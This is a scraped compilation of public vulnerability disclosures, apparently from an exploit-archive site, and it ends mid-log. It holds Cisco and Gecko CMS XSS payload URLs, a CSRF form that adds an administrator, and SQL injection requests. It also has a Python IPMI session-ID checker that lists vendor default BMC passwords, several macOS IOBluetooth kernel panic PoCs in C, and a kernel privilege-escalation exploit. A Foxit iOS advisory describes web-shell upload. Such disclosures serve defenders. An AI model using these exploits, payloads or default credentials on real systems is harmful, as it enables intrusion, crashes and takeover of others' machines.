HireHackking

source: https://www.securityfocus.com/bid/47901/info Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. Other attacks may also be possible. This issue is being tracked by Cisco Bug ID CSCtn61716. http://www.example.com/iptm/logicalTopo.do?clusterName=&ccmName=ed1b1"%3balert(1)//cda6137ae 4c http://www.example.com/iptm/logicalTopo.do?clusterName=db4c1"%3balert(1)//4031caf63d7

Gecko CMS 2.3 Multiple Vulnerabilities Vendor: JAKWEB Product web page: http://www.cmsgecko.com Affected version: 2.3 and 2.2 Summary: Gecko CMS is the way to go, forget complicated, bloated and slow content management systems, Gecko CMS has been build to be intuitive, easy to use, extendable to almost anything, running on all standard web hosting (PHP and one MySQL database, Apache is a plus), browser compatibility and fast, super fast! Desc: Gecko CMS suffers from multiple vulnerabilities including Cross-Site Request Forgery, Stored and Reflected Cross-Site Scripting and SQL Injection. Tested on: Apache/2 PHP/5.4.36 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5222 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5222.php 27.12.2014 --- CSRF Add Admin: =============== <html> <body> <form action="http://server/admin/index.php?p=user&sp=newuser" method="POST"> <input type="hidden" name="jak_name" value="Testingus2" /> <input type="hidden" name="jak_email" value="test2@test.test" /> <input type="hidden" name="jak_username" value="Testusername2" /> <input type="hidden" name="jak_usergroup" value="3" /> <input type="hidden" name="jak_access" value="1" /> <input type="hidden" name="jak_password" value="123123" /> <input type="hidden" name="jak_confirm_password" value="123123" /> <input type="hidden" name="save" value="" /> <input type="submit" value="Submit form" /> </form> </body> </html> usergroup 4 = moderator 3 = administrator 2 = member standard 1 = guest 5 = banned Stored XSS (params: jak_img, jak_name, jak_url): ================================================ POST http://server/admin/index.php?p=categories&sp=newcat HTTP/1.1 jak_catparent 0 jak_catparent2 0 jak_footer 1 jak_img "><script>alert(1);</script> jak_lcontent <p>test</p> jak_lcontent2 jak_menu 1 jak_name "><script>alert(2);</script> jak_name2 jak_url "><script>alert(3);</script> jak_varname ZSL save SQL Injection (params: jak_delete_log[], ssp): ============================================== POST /admin/index.php?p=logs&sp=s HTTP/1.1 delete=&jak_delete_log%5B%5D=4%20and%20benchmark(20000000%2csha1(1))--%20&jak_delete_log%5B%5D=2&jak_delete_log%5B%5D=1 -- GET /admin/index.php?p=logs&sp=delete&ssp=3[SQLi] HTTP/1.1 Reflected XSS: ============== /admin/index.php [horder%5B%5D parameter] /admin/index.php [jak_catid parameter] /admin/index.php [jak_content parameter] /admin/index.php [jak_css parameter] /admin/index.php [jak_delete_log%5B%5D parameter] /admin/index.php [jak_email parameter] /admin/index.php [jak_extfile parameter] /admin/index.php [jak_file parameter] /admin/index.php [jak_hookshow%5B%5D parameter] /admin/index.php [jak_img parameter] /admin/index.php [jak_javascript parameter] /admin/index.php [jak_lcontent parameter] /admin/index.php [jak_name parameter] /admin/index.php [jak_password parameter] /admin/index.php [jak_showcontact parameter] /admin/index.php [jak_tags parameter] /admin/index.php [jak_title parameter] /admin/index.php [jak_url parameter] /admin/index.php [jak_username parameter] /admin/index.php [real_hook_id%5B%5D parameter] /admin/index.php [sp parameter] /admin/index.php [sreal_plugin_id%5B%5D parameter] /admin/index.php [ssp parameter] /admin/index.php [sssp parameter] /js/editor/plugins/filemanager/dialog.php [editor parameter] /js/editor/plugins/filemanager/dialog.php [field_id parameter] /js/editor/plugins/filemanager/dialog.php [fldr parameter] /js/editor/plugins/filemanager/dialog.php [lang parameter] /js/editor/plugins/filemanager/dialog.php [popup parameter] /js/editor/plugins/filemanager/dialog.php [subfolder parameter] /js/editor/plugins/filemanager/dialog.php [type parameter]

""" For testing purposes only. (c) Yong Chuan, Koh 2014 """ from time import sleep from socket import * from struct import * from random import * import sys, os, argparse HOST = None PORT = 623 bufsize = 1024 recv = "" # create socket UDPsock = socket(AF_INET,SOCK_DGRAM) UDPsock.settimeout(2) data = 21 #offset of data start RMCP = ('\x06' + #RMCP.version = ASF RMCP v1.0 '\x00' + #RMCP.reserved '\xFF' + #RMCP.seq '\x07' #RMCP.Type/Class = Normal_RMCP/IPMI ) def SessionHeader (ipmi, auth_type='None', seq_num=0, sess_id=0, pwd=None): auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5} sess_header = '' sess_header += pack('<B', auth_types[auth_type]) sess_header += pack('<L', seq_num) sess_header += pack('<L', sess_id) if auth_type is not 'None': raw = pwd + pack('<L', sess_id) + ipmi + pack('<L', seq_num) + pwd import hashlib h = hashlib.md5(raw) sess_header += h.digest() sess_header += pack('B', len(ipmi)) return sess_header class CreateIPMI (): def __init__ (self): self.priv_lvls = {'Reserved':0, 'Callback':1, 'User':2, 'Operator':3, 'Admin':4, 'OEM':5, 'NO ACCESS':15 } self.priv_lvls_2 = {0:'Reserved', 1:'Callback', 2:'User', 3:'Operator', 4:'Admin', 5:'OEM', 15:'NO ACCESS'} self.auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5} def CheckSum (self, bytes): chksum = 0 q = '' for i in bytes: q += '%02X ' %ord(i) chksum = (chksum + ord(i)) % 0x100 if chksum > 0: chksum = 0x100 - chksum return pack('>B', chksum) def Header (self, cmd, seq_num=0x00): #only for IPMI v1.5 cmds = {'Get Channel Auth Capabilities' : (0x06, 0x38), #(netfn, cmd_code) 'Get Session Challenge' : (0x06, 0x39), 'Activate Session' : (0x06, 0x3a), 'Set Session Privilege Level' : (0x06, 0x3b), 'Close Session' : (0x06, 0x3c), 'Set User Access' : (0x06, 0x43), 'Get User Access' : (0x06, 0x44), 'Set User Name' : (0x06, 0x45), 'Get User Name' : (0x06, 0x46), 'Set User Password' : (0x06, 0x47), 'Get Chassis Status' : (0x00, 0x01)} ipmi_header = '' ipmi_header += pack('<B', 0x20) #target addr ipmi_header += pack('<B', cmds[cmd][0]<<2 | 0) #netfn | target lun ipmi_header += self.CheckSum (ipmi_header) ipmi_header += pack('<B', 0x81) #source addr ipmi_header += pack('<B', seq_num<<2 | 0) #seq_num | source lun ipmi_header += pack('<B', cmds[cmd][1]) #IPMI message command return ipmi_header def GetChannelAuthenticationCapabilities (self, hdr_seq, chn=0x0E, priv_lvl='Admin'): ipmi = '' ipmi += self.Header('Get Channel Auth Capabilities', hdr_seq) ipmi += pack('<B', 0<<7 | chn) #IPMI v1.5 | chn num (0-7, 14=current_chn, 15) ipmi += pack('<B', self.priv_lvls[priv_lvl]) #requested privilege level ipmi += self.CheckSum (ipmi[3:]) return ipmi def GetSessionChallenge (self, hdr_seq, username, auth_type='MD5'): #only for IPMI v1.5 ipmi = '' ipmi += self.Header('Get Session Challenge', hdr_seq) ipmi += pack('<B', self.auth_types[auth_type]) #authentication type ipmi += username #user name ipmi += self.CheckSum(ipmi[3:]) return ipmi def ActivateSession (self, hdr_seq, authcode, auth_type='MD5', priv_lvl='Admin'): #only for IPMI v1.5 ipmi = '' ipmi += self.Header('Activate Session', hdr_seq) ipmi += pack('>B', self.auth_types[auth_type]) ipmi += pack('>B', self.priv_lvls[priv_lvl]) ipmi += authcode #challenge string ipmi += pack('<L', 0xdeadb0b0) #initial outbound seq num ipmi += self.CheckSum(ipmi[3:]) return ipmi def SetSessionPrivilegeLevel (self, hdr_seq, priv_lvl='Admin'): #only for IPMI v1.5 ipmi = '' ipmi += self.Header('Set Session Privilege Level', hdr_seq) ipmi += pack('>B', self.priv_lvls[priv_lvl]) ipmi += self.CheckSum(ipmi[3:]) return ipmi def CloseSession (self, hdr_seq, sess_id): ipmi = '' ipmi += self.Header ("Close Session", hdr_seq) ipmi += pack('<L', sess_id) ipmi += self.CheckSum(ipmi[3:]) return ipmi def GetChassisStatus (self, hdr_seq): ipmi = '' ipmi += self.Header ("Get Chassis Status", hdr_seq) ipmi += self.CheckSum(ipmi[3:]) return ipmi def GetUserAccess (self, hdr_seq, user_id, chn_num=0x0E): ipmi = '' ipmi += self.Header ("Get User Access", hdr_seq) ipmi += pack('>B', chn_num) #chn_num = 0x0E = current channel ipmi += pack('>B', user_id) ipmi += self.CheckSum(ipmi[3:]) return ipmi def GetUserName (self, hdr_seq, user_id=2): ipmi = '' ipmi += self.Header ("Get User Name", hdr_seq) ipmi += pack('>B', user_id) ipmi += self.CheckSum(ipmi[3:]) return ipmi def SetUserName (self, hdr_seq, user_id, user_name): #Assign user_name to user_id, replaces if user_id is occupied ipmi = '' ipmi += self.Header ("Set User Name", hdr_seq) ipmi += pack('>B', user_id) ipmi += user_name.ljust(16, '\x00') ipmi += self.CheckSum(ipmi[3:]) return ipmi def SetUserPassword (self, hdr_seq, user_id, password, op='set password'): ops = {'disable user':0, 'enable user':1, 'set password':2, 'test password':3} ipmi = '' ipmi += self.Header ("Set User Password", hdr_seq) ipmi += pack('>B', user_id) ipmi += pack('>B', ops[op]) ipmi += password.ljust(16, '\x00') #IPMI v1.5: 16bytes | IPMI v2.0: 20bytes ipmi += self.CheckSum(ipmi[3:]) return ipmi def SetUserAccess (self, hdr_seq, user_id, new_priv, chn=0x0E): ipmi = '' ipmi += self.Header ("Set User Access", hdr_seq) ipmi += pack('<B', 1<<7 | 0<<6 | 0<<5 | 1<<4 | chn) #bit4=1=enable user for IPMI Messaging | chn=0xE=current channel ipmi += pack('>B', user_id) ipmi += pack('>B', self.priv_lvls[new_priv]) ipmi += pack('>B', 0) ipmi += self.CheckSum(ipmi[3:]) return ipmi def SendUDP (pkt): global HOST, PORT, data res = '' code = ipmi_seq = 0xFFFF for i in range(5): try: UDPsock.sendto(pkt, (HOST, PORT)) res = UDPsock.recv(bufsize) except Exception as e: print '[-] Socket Timeout: Try %d'%i sleep (0) else: #have received a reply if res[4:5] == '\x02': #Session->AuthType = MD5 data += 16 code = unpack('B',res[data-1:data])[0] ipmi_seq= unpack('B',res[data-3:data-2])[0]>>2 if res[4:5] == '\x02': data -= 16 break return code, ipmi_seq, res def SetUpSession (username, pwd, priv='Admin', auth='MD5'): global data #Get Channel Authentication Capabilities ipmi = CreateIPMI().GetChannelAuthenticationCapabilities(0, chn=0xE, priv_lvl=priv) code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi) if code != 0x00: return code, 0, 0, 0 #print '[+]%-30s: %02X (%d)'%('Get Chn Auth Capabilities', code, ipmi_seq) #Get Session Challenge ipmi = CreateIPMI().GetSessionChallenge(1, username, 'MD5') code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi) if code != 0x00: if code == 0xFFFF: print "[-] BMC didn't respond to IPMI v1.5 session setup" print " If firmware had disabled it, then BMC is not vulnerable" return code, 0, 0, 0 temp_sess_id = unpack('<L', res[data:data+4])[0] challenge_str = res[data+4:data+4+16] #print '[+]%-30s: %02X (%d)'%('Get Session Challenge', code, ipmi_seq) #Activate Session ipmi = CreateIPMI().ActivateSession(2, challenge_str, auth, priv) code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, auth, 0, temp_sess_id, pwd) + ipmi) if code != 0x00: return code, 0, 0, 0 data += 16 sess_auth_type = unpack('B', res[data:data+1])[0] sess_id = unpack('<L', res[data+1:data+1+4])[0] ini_inbound = sess_hdr_seq = unpack('<L', res[data+5:data+5+4])[0] sess_priv_lvl = unpack('B', res[data+9:data+9+1])[0] #print '[+]%-30s: %02X (%d)'%('Activate Session', code, ipmi_seq) #print ' %-30s: Session_ID %08X'%sess_id data -= 16 #Set Session Privilege Level ipmi = CreateIPMI().SetSessionPrivilegeLevel(3, priv) code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_hdr_seq, sess_id) + ipmi) sess_hdr_seq += 1 if code != 0x00: return code, 0, 0, 0 new_priv_lvl = unpack('B', res[data:data+1])[0] #print '[+]%-30s: %02X (%d)'%('Set Session Priv Level', code, ipmi_seq) return code, temp_sess_id, sess_hdr_seq, sess_id def CloseSession (sess_seq, sess_id): global data #Close Session ipmi = CreateIPMI().CloseSession(5, sess_id) code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi) #print '[+]%-30s: %02X (%d)'%('Close Session', code, ipmi_seq) return code def CheckSessionAlive(sess_seq, sess_id): #SetUserPassword(): "user enable <user_id>" ipmi = CreateIPMI().GetChassisStatus(31) code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi) print '[+] %-35s: %02X (%d)'%('CheckSessionAlive->GetChassisStatus', code, ipmi_seq) sess_seq += 1 return sess_seq def banner(): print ("######################################################\n"+\ "## This tool checks whether a BMC machine is vulnerable to CVE-2014-8272\n"+\ "## (http://www.kb.cert.org/vuls/id/843044)\n"+\ "## by logging the TemporarySessionID/SessionID in each IPMI v1.5 session,\n"+\ "## and checking that these values are incremental\n"+\ "## \n"+\ "## Author: Yong Chuan, Koh\n"+\ "## Email: yongchuan.koh@mwrinfosecurity.com\n"+\ "## (c) Yong Chuan, Koh 2014\n"+\ "######################################################\n") def main(): banner() #default usernames/passwords (https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi) vendors = {"HP" :{"user":"Administrator", "pwd":""}, #no default pwd: <factory randomized 8-character string> "DELL" :{"user":"root", "pwd":"calvin"}, "IBM" :{"user":"USERID", "pwd":"PASSW0RD"}, "FUJITSU" :{"user":"admin", "pwd":"admin"}, "SUPERMICRO" :{"user":"ADMIN", "pwd":"ADMIN"}, "ORACLE" :{"user":"root", "pwd":"changeme"}, "ASUS" :{"user":"admin", "pwd":"admin"} } arg = argparse.ArgumentParser(description="Test for CVE-2014-8272: Use of Insufficiently Random Values") arg.add_argument("-i", "--ip", required=True, help="IP address of BMC server") arg.add_argument("-u", "--udpport", nargs="?", default=623, type=int, help="Port of BMC server (optional: default 623)") arg.add_argument("-v", "--vendor", nargs="?", help="Server vendor of BMC (optional: for default BMC credentials)") arg.add_argument("-n", "--username", nargs="?", default=None, help="Username of BMC account (optional: for non-default credentials)") arg.add_argument("-p", "--password", nargs="?", default=None, help="Password of BMC account (optional: for non-default credentials)") args = arg.parse_args() if args.vendor is not None: args.vendor = args.vendor.upper() if (args.vendor is None or args.vendor not in vendors.keys()) and (args.username is None or args.password is None): print "[-] Error: -n and -p are required because -v is not specified/in default list" print " Vendors with Default Accounts" print " -----------------------------------" for vendor,acct in vendors.iteritems(): print " %s: username='%s', password='%s'"%(vendor,acct["user"],acct["pwd"]) sys.exit(1) if args.username is None: args.username = vendors[args.vendor]["user"].ljust(16, '\x00') if args.password is None: args.password = vendors[args.vendor]["pwd"].ljust(16, '\x00') global HOST, PORT HOST = args.ip PORT = args.udpport print "Script Parameters" print "-------------------------" print "IP : %s"%HOST print "Port : %d"%PORT print "Username : %s"%args.username print "Password : %s"%args.password session_ids = [] for i in xrange(0x80): #do not go beyond 0xFF, because of how session_ids is checked for incremental later try: code, temp_sess_id, sess_seq, sess_id = SetUpSession (args.username, args.password, priv='Admin', auth='MD5') if code == 0: session_ids.append(temp_sess_id) session_ids.append(sess_id) print '[+%04X] temp_sess_id=%08X, sess_id=%08X'%(i, temp_sess_id, sess_id) else: #print '[-%04X] SetUp Session: Trying again after timeout 5s'%(i) sleep(5) continue code = CloseSession (sess_seq, sess_id) if code == 0: #print '[+%04X] Close Session OK'%(i) i += 1 sleep (0.5) else: #print '[-%04X] Close Session fail: Wait for natural timeout (60+/-3s)'%(i) sleep(65) except Exception as e: exc_type, exc_obj, exc_tb = sys.exc_info() fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1] print (exc_type, fname, exc_tb.tb_lineno) session_ids = session_ids[:0xFF] #get the first incremental diff const_diff = None for i in xrange(1, len(session_ids)): if session_ids[i-1] < session_ids[i]: const_diff = session_ids[i] - session_ids[i-1] break #check if session_ids are increasing at a fixed value vulnerable = True crossed_value_boundary = 0 for i in xrange(1, len(session_ids)): if session_ids[i]-session_ids[i-1] != const_diff: if crossed_value_boundary < 2: crossed_value_boundary += 1 else: vulnerable = False if vulnerable: print "Conclusion: BMC is vulnerable to CVE-2014-8272" else: print "Conclusion: BMC is not vulnerable to CVE-2014-8272" if __name__ == "__main__": main()

/* * crash-issue2.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick. * * Triggers a panic overwriting a stack_canary. * * gcc -Wall -o crash-issue2{,.c} -framework IOKit * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <mach/mach.h> #include <mach/vm_map.h> #include <IOKit/IOKitLib.h> struct BluetoothCall { uint64_t args[7]; uint64_t sizes[7]; uint64_t index; }; int main(void) { /* Finding vuln service */ io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController")); if (!service) { return -1; } /* Connect to vuln service */ io_connect_t port = (io_connect_t) 0; kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); IOObjectRelease(service); if (kr != kIOReturnSuccess) { return kr; } printf(" [+] Opened connection to service on port: %d\n", port); struct BluetoothCall a; a.sizes[0] = 0x1000; a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char)); /* This arguments overflows a local buffer and the adjacent stack canary */ a.sizes[1] = 264; a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char)); memset((void *)a.args[1], 'A', a.sizes[1]); /* Call IOBluetoothHCIUserClient::DispatchHCIReadLocalName() */ a.index = 0x2d; /* Debug */ for(int i = 0; i < 120; i++) { if(i % 8 == 0) printf("\n"); printf("\\x%02x", ((unsigned char *)&a)[i]); } printf("\n"); fflush(stdout); kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) &a, /* inputStruct */ sizeof(a), /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ printf("kr: %08x\n", kr); return IOServiceClose(port); }

/* * crash-issue1.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick. * * Exploits a missing check in * IOBluetoothHCIUserClient::DispatchHCICreateConnection() causing a panic. * * gcc -Wall -o crash-issue1{,.c} -framework IOKit */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <mach/mach.h> #include <mach/vm_map.h> #include <IOKit/IOKitLib.h> #define SIZE 0x1000 struct BluetoothCall { uint64_t args[7]; uint64_t sizes[7]; uint64_t index; }; int main(void) { /* Finding vuln service */ io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController")); if (!service) { return -1; } /* Connect to vuln service */ io_connect_t port = (io_connect_t) 0; kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); IOObjectRelease(service); if (kr != kIOReturnSuccess) { return kr; } printf(" [+] Opened connection to service on port: %d\n", port); struct BluetoothCall a; int i; for (i=0; i<7; i++) { a.args[i] = (uint64_t) calloc(SIZE, sizeof(char)); a.sizes[i] = SIZE; } /* This value causes IOMalloc() to fail */ a.args[6] = 0x0; a.sizes[6] = 0x80000041; a.index = 0x06; /* DispatchHCICreateConnection() */ for(i = 0; i < 120; i++) { if(i % 8 == 0) printf("\n"); printf("\\x%02x", ((unsigned char *)&a)[i]); } printf("\n"); kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) &a, /* inputStruct */ 120, /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ printf("kr: %08x\n", kr); return IOServiceClose(port); }

/* * crash-issue3.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick. * * Exploits a missing check in * IOBluetoothHCIController::TransferACLPacketToHW() to trigger a panic. * * gcc -Wall -o crash-issue3{,.c} -framework IOKit * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <mach/mach.h> #include <mach/vm_map.h> #include <IOKit/IOKitLib.h> struct BluetoothCall { uint64_t args[7]; uint64_t sizes[7]; uint64_t index; }; int main(void) { /* Finding vuln service */ io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController")); if (!service) { return -1; } /* Connect to vuln service */ io_connect_t port = (io_connect_t) 0; kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); IOObjectRelease(service); if (kr != kIOReturnSuccess) { return kr; } printf(" [+] Opened connection to service on port: %d\n", port); struct BluetoothCall a; memset(&a, 0, sizeof(a)); a.sizes[0] = 0x1000; a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char)); a.sizes[1] = 0x1000; a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char)); memset((void *)a.args[1], 0x22, 0x1000); /* Call DispatchHCISendRawACLData() */ a.index = 0x63; /* Debug */ for(int i = 0; i < 120; i++) { if(i % 8 == 0) printf("\n"); printf("\\x%02x", ((unsigned char *)&a)[i]); } printf("\n"); fflush(stdout); kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) &a, /* inputStruct */ sizeof(a), /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ printf("kr: %08x\n", kr); return IOServiceClose(port); }

/* * lpe-issue1.c * Written for Mac OS X Yosemite (10.10.1) by @joystick and @rpaleari. * * Exploits IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() * * gcc -Wall -o lpe-issue1{,.c} -framework IOKit * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <mach/mach.h> #include <mach/vm_map.h> #include <IOKit/IOKitLib.h> #define SIZE 0x1000 struct BluetoothCall { uint64_t args[7]; uint64_t sizes[7]; uint64_t index; }; #ifndef bswap64 # define bswap64(num) \ ( (((uint64_t)(num) << 56) ) \ | (((uint64_t)(num) << 40) & UINT64_C(0x00FF000000000000)) \ | (((uint64_t)(num) << 24) & UINT64_C(0x0000FF0000000000)) \ | (((uint64_t)(num) << 8) & UINT64_C(0x000000FF00000000)) \ | (((uint64_t)(num) >> 8) & UINT64_C(0x00000000FF000000)) \ | (((uint64_t)(num) >> 24) & UINT64_C(0x0000000000FF0000)) \ | (((uint64_t)(num) >> 40) & UINT64_C(0x000000000000FF00)) \ | (((uint64_t)(num) >> 56) ) ) #endif void create_requests(io_connect_t port) { struct BluetoothCall a; uint32_t i; kern_return_t kr; for (i = 0; i < 7; i++) { a.args[i] = (uint64_t) calloc(SIZE, sizeof(char)); a.sizes[i] = SIZE; } /* DispatchHCIRequestCreate() */ a.index = 0x0; *(uint64_t *)a.args[0] = 5*1000; /* Timeout */ memset((void *)a.args[1], 0x81, 0x1000); memset((void *)a.args[2], 0x82, 0x1000); memset((void *)a.args[3], 0x83, 0x1000); memset((void *)a.args[4], 0x84, 0x1000); memset((void *)a.args[5], 0x85, 0x1000); memset((void *)a.args[6], 0x86, 0x1000); for(i = 0; i < 500; i++) { kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) &a, /* inputStruct */ 120, /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ if(kr == 0xe00002bd) /* Full */ break; } } int main(void) { struct BluetoothCall a; int i; void *landing_page = calloc(SIZE, sizeof(char)); /* Init a */ for (i = 0; i < 7; i++) { a.args[i] = (uint64_t) calloc(SIZE, sizeof(char)); a.sizes[i] = SIZE; } /* Finding vuln service */ io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController")); if (!service) { return -1; } /* Connect to vuln service */ io_connect_t port = (io_connect_t) 0; kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); IOObjectRelease(service); if (kr != kIOReturnSuccess) { return kr; } /* Populating with fake requests. */ create_requests(port); /* IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() */ a.index = 42; /* Req number */ *((uint32_t *)a.args[0]) = 1; /* num_of_keys */ *((uint32_t *)a.args[1]) = 0x20; /* Padding */ memset((void *)a.args[3], 0x33, 152); /* mov rdi, [r14+0AB8h] */ *((uint64_t *)(a.args[3]+152)) = bswap64((uint64_t)landing_page); /* mov rax, [rdi] */ *((uint64_t *)((uint64_t)landing_page)) = (uint64_t)landing_page; /* call [rax+0x1d0]: this will trigger a #GP calling 0x4141414142424242 */ *((uint64_t *)((uint64_t)landing_page+0x1d0)) = (uint64_t) 0x4141414142424242; /* Here some fixing to the vtable is required to return cleanly after the exploit */ #if 0 /* Debug print */ for(i = 0; i < 120; i++) { if(i % 8 == 0) printf("\n"); printf("\\x%02x", ((unsigned char *)&a)[i]); } printf("\n"); #endif kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ (uint32_t) 0, /* Selector */ NULL, 0, /* input, inputCnt */ (const void*) &a, /* inputStruct */ 120, /* inputStructCnt */ NULL, NULL, NULL, NULL); /* Output stuff */ printf("kr: %08x\n", kr); return IOServiceClose(port); }

Document Title: =============== Foxit MobilePDF v4.4.0 iOS - Multiple Web Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1400 Release Date: ============= 2015-01-12 Vulnerability Laboratory ID (VL-ID): ==================================== 1400 Common Vulnerability Scoring System: ==================================== 6.9 Product & Service Introduction: =============================== Foxit MobilePDF enables you to view and annotate PDF documents on the go, allowing you to work on your PDF documents anytime, anywhere. Specify the permissions to restrict operations to PDF files, such as copying content, adding annotation, managing page & bookmark, and printing. Share, store and synchronize PDF files. (Copy of the Vendor Homepage: https://itunes.apple.com/us/app/foxit-mobile-pdf/id507040546 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Foxit MobilePDF v4.4.0 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-12: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Foxit Corporation Product: MobilePDF - iOS Web Application (Wifi) 4.4.0 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ 1.1 A local file include web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application. The local file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The vulnerability is located in the `filename` value of the wifi interface `upload` module. Local attackers are able to manipulate the wifi web interface by usage of the vulnerable `upload` POST method request. The service does not encode or parse the `filename` context on uploads. Attackers can include an existing local application path or an existing local device path as source in connection with script code to compromise the iOS app. The execution of unauthorized local file or path request occurs in the index of documents module of the wifi file service application after the inject. The request method to inject is POST and the attack vector is located on the application-side of the affected iOS application. The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. Exploitation of the local file include web vulnerability in the upload module requires no user interaction or privileged web-application user account. Successful exploitation of the local file include web vulnerability results in mobile application compromise or compromised device components. Vulnerable Method(s): [+] POST Vulnerable Module(s): [+] Upload Vulnerable Parameter(s): [+] filename (name) Affected Module(s): [+] Index of Documents (http://localhost:8888) 1.2 An arbitrary file upload web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application. The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the system validation and compromise the web-server. The vulnerability is located in the filename value of the `upload` file module. Remote attackers are able to upload a php or js web-shell by a rename of the filename with multiple extensions in the upload POST method request. The attacker uploads for example a web-shell with the following name and extension `pentest.png.html.php.js.aspx.png`. After the upload the attacker needs to open the file in the wifi web-application interface. He deletes the .png file extension and can access the webshell with elevated access rights to execute. The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6. Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password. Successful exploitation of the arbitrary file upload vulnerability results in unauthorized file access (aap/device) and compromise of http web-server. Request Method(s): [+] [POST] Vulnerable Module(s): [+] Upload Vulnerable Parameter(s): [+] filename (multiple extensions) Affected Module(s): [+] Index of Documents (http://localhost:8888) Proof of Concept (PoC): ======================= 1.1 The local file include vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Download and install the FoxIT MobilePDF iOS application 2. Surf to the Documents Index of the Wifi Server (http://localhost:8888) 3. Start to choose a file for the upload function by usage of the search 4. Intercept the session by usage of a tamper and change the name value to the local device path source 5. Continue the request and save the settings. After that go back to the Index of Documents Note: The execution of the script code occurs in the vulnerable name value of the index file dir list 6. Successful reproduce of the security vulnerability! PoC: Index of Documents (Name) <tr><td><a href="/<img src="><img src="./[LOCAL FILE INCLUDE VULNERABILITY!]</a"></a></td><td align="center">file</td> <td align="center"><span class="m">2015-01-10 13:49</span></td><td align="center"><span class="s">538 B</span></td></tr> --- PoC Session Logs [POST] (File Include > Upload)--- Status: 200[OK] POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3624] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8888] User-Agent [Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8888/] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------3796507625132 Content-Disposition: form-data; name="button"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]+2.png" Content-Type: image/png --- PoC Session Logs [GET] (File Dir Index List)--- 13:54:26.427[48ms][total 48ms] Status: 